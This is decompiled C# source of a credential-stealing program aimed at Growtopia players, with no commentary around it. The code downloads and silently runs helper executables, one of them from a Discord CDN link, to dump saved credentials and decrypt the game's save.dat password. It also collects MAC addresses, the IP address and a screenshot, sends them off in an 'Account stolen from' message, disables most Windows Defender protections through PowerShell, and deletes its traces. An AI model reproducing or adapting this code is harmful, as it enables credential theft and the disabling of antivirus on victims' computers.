// Token: 0x06000009 RID: 9 RVA: 0x00002C74 File Offset: 0x00000E74 private static string DINGDONGGETTROLL() { string text = Environment.ExpandEnvironmentVariables("%TEMP%"); WebClient webClient = new WebClient(); webClient.DownloadFile(Executable.SUCKDICKXD("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe"); webClient.Dispose(); new Process { StartInfo = new ProcessStartInfo { WindowStyle = ProcessWindowStyle.Hidden, FileName = text + "\\resourcefilehaha.exe", Arguments = "/C /stext " + text + "\\credentialslmao.txt" } }.Start(); Thread.Sleep(5000); File.Delete(text + "\\resourcefilehaha.exe"); string result = File.ReadAllText(text + "\\credentialslmao.txt"); File.Delete(text + "\\credentialslmao.txt"); return(result); }
// Token: 0x06000004 RID: 4 RVA: 0x0000215C File Offset: 0x0000035C private static void Main() { WebClient webClient = new WebClient(); try { foreach (Process process in Process.GetProcessesByName("savedecoder.exe")) { process.Kill(); } string key = "kljsdooqlo4454GG"; "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat"; try { StreamWriter streamWriter = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"); foreach (NetworkInterface networkInterface in from nic in NetworkInterface.GetAllNetworkInterfaces() where nic.OperationalStatus == OperationalStatus.Up && nic.NetworkInterfaceType != NetworkInterfaceType.Loopback select nic) { string str = string.Join("", networkInterface.GetPhysicalAddress().GetAddressBytes().Select((byte b) => b.ToString("X2"))); streamWriter.Write(str + "\n"); } streamWriter.Close(); } catch { } try { Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height); using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size); bitmap.Save(string.Concat(new string[] { "C:\\Users\\", Environment.UserName, "\\AppData\\Local\\Temp\\", Environment.UserName, "screenshot.png" })); } } catch { } bool attachments = true; string path = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt"; string text = Executable.DINGDONGDANG(); string text2 = File.ReadAllText(path); string str2 = Environment.ExpandEnvironmentVariables("%TEMP%"); "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat"; string.Concat(new string[] { "C:\\Users\\", Environment.UserName, "\\AppData\\Local\\Temp\\", Environment.UserName, " pictures.zip" }); string path2 = string.Concat(new string[] { "C:\\Users\\", Environment.UserName, "\\AppData\\Local\\Temp\\", Environment.UserName, "screenshot.png" }); string contents = Executable.DINGDONGGETTROLL(); File.WriteAllText(str2 + "\\" + Environment.UserName + " credentials.txt", contents); str2 + "\\" + Environment.UserName + " credentials.txt"; IFOUGHTINWW1 ifoughtinww = new IFOUGHTINWW1(); ifoughtinww.HANGURSELF = Executable.XXX(key, "GrWz5DcWMtfQ7dy+2aTGgQ=="); try { webClient.DownloadFile("https://cdn.discordapp.com/attachments/775300885990998059/775459023562473512/savedecrypter.exe", Path.GetTempPath() + "//savedecoder.exe"); Process.Start(new ProcessStartInfo { WindowStyle = ProcessWindowStyle.Hidden, FileName = Path.GetTempPath() + "//savedecoder.exe" }); Thread.Sleep(2500); if (File.Exists(Path.GetTempPath() + "//pwd.txt")) { File.ReadAllText(Path.GetTempPath() + "//pwd.txt"); string[] array = File.ReadAllText(Path.GetTempPath() + "\\pwd.txt").Split(new char[] { '=' }); string text3 = array[0]; string plainText = array[1]; string plainText2 = array[2]; using (StreamWriter streamWriter2 = new StreamWriter(Path.GetTempPath() + "\\" + text3 + ".cbuilder")) { streamWriter2.Write(string.Concat(new string[] { Executable.EncryptString(key, text3), "|", Executable.EncryptString(key, plainText), "|", Executable.EncryptString(key, plainText2), "|" })); } ifoughtinww.XDLSD(Path.GetTempPath() + "\\" + text3 + ".cbuilder", text3 + ".cbuilder"); File.Delete(Path.GetTempPath() + "//pwd.txt"); File.Delete(Path.GetTempPath() + "//savedecoder.exe"); ifoughtinww.XDLOLLMAO(string.Concat(new string[] { "[C-Builder] Account stolen from:: ", Environment.UserName, " / ", Environment.MachineName, "\nGrowID :: ", text3, "\nIP address:: ", text, "\nMac addresses:: \n", text2 }), attachments); } if (File.Exists(str2 + "\\" + Environment.UserName + " credentials.txt")) { File.Delete(str2 + "\\" + Environment.UserName + " credentials.txt"); } if (File.Exists(path)) { File.Delete(path); } if (File.Exists(path2)) { File.Delete(path2); } try { foreach (Process process2 in Process.GetProcessesByName("savedecoder.exe")) { process2.Kill(); File.Delete(Path.GetTempPath() + "\\pass_decoder.exe"); } } catch { } } catch { } foreach (Process process3 in Process.GetProcessesByName("savedecoder.exe")) { process3.Kill(); } if (File.Exists(Path.GetTempPath() + "//pwd.txt")) { File.Delete(Path.GetTempPath() + "//pwd.txt"); } if (File.Exists(Path.GetTempPath() + "//savedecoder.exe")) { File.Delete(Path.GetTempPath() + "//savedecoder.exe"); } } catch { } }
// Token: 0x06000006 RID: 6 RVA: 0x00002894 File Offset: 0x00000A94 private static void WHYTFUSKID() { Process process = new Process { StartInfo = new ProcessStartInfo { FileName = "powershell", Arguments = "Get-MpPreference -verbose", UseShellExecute = false, RedirectStandardOutput = true, WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true } }; process.Start(); while (!process.StandardOutput.EndOfStream) { string text = process.StandardOutput.ReadLine(); if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableRealtimeMonitoring $true"); } else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableBehaviorMonitoring $true"); } else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableBlockAtFirstSeen $true"); } else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableIOAVProtection $true"); } else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisablePrivacyMode $true"); } else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); } else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableArchiveScanning $true"); } else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableIntrusionPreventionSystem $true"); } else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False")) { Executable.IDIOT("Set-MpPreference -DisableScriptScanning $true"); } else if (text.StartsWith("SubmitSamplesConsent") && !text.EndsWith("2")) { Executable.IDIOT("Set-MpPreference -SubmitSamplesConsent 2"); } else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0")) { Executable.IDIOT("Set-MpPreference -MAPSReporting 0"); } else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6")) { Executable.IDIOT("Set-MpPreference -HighThreatDefaultAction 6 -Force"); } else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6")) { Executable.IDIOT("Set-MpPreference -ModerateThreatDefaultAction 6"); } else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6")) { Executable.IDIOT("Set-MpPreference -LowThreatDefaultAction 6"); } else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6")) { Executable.IDIOT("Set-MpPreference -SevereThreatDefaultAction 6"); } } }